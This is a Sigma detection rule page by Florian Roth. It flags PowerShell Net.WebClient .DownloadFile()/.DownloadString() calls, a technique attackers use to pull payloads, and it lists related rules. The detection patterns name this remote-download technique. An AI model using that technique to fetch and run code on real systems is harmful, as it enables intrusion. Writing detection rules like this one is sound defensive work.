PowerShell Download Via Net.WebClient - PowerShell Classic
Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class. This technique is often abused by attackers to download additional payloads.
Sigma rule (View on GitHub)
1title: PowerShell Download Via Net.WebClient - PowerShell Classic
2id: 3236fcd0-b7e3-4433-b4f8-86ad61a9af2d
3related:
4 - id: 65531a81-a694-4e31-ae04-f8ba5bc33759
5 type: derived
6status: test
7description: |
8 Detects PowerShell download activity, via the .DownloadFile() or .DownloadString() methods of the Net.WebClient class.
9 This technique is often abused by attackers to download additional payloads.
10references:
11 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
12author: Florian Roth (Nextron Systems)
13date: 2017-03-05
14modified: 2026-04-28
15tags:
16 - attack.execution
17 - attack.command-and-control
18 - attack.t1059.001
19 - attack.t1105
20logsource:
21 product: windows
22 category: ps_classic_start
23detection:
24 selection_webclient:
25 Data|contains: 'Net.WebClient'
26 selection_download:
27 Data|contains:
28 - '.DownloadFile('
29 - '.DownloadString('
30 condition: all of selection_*
31falsepositives:
32 - This activity may be used by legitimate software, such as patch management tools or software updaters. Investigate any such activity and apply the necessary filter.
33level: low
References
Related rules
- Command Line Execution with Suspicious URL and AppData Strings
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Netcat The Powershell Version
- Kalambur Backdoor Curl TOR SOCKS Proxy Execution
- Suspicious Deno File Written from Remote Source